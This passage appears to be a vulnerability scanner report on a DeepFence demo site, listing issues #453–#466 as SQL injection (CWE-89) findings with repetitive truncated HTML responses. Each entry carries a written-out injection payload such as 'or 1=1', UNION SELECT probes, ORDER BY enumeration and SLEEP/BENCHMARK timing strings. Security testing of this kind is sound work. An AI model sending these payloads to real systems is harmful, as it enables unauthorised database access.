\nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #453\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor 1=1/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #454\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #455\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 17#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #456\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io RANDOMBLOB(500000000/2)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #457\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #458\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #459\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #460Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 30--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #461\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioadmin\" or 1=1#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #462\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #463\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1 AND (SELECT * FROM Users) = 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #464\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io 1)) or benchmark(10000000,MD5(1))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #465\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #466\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 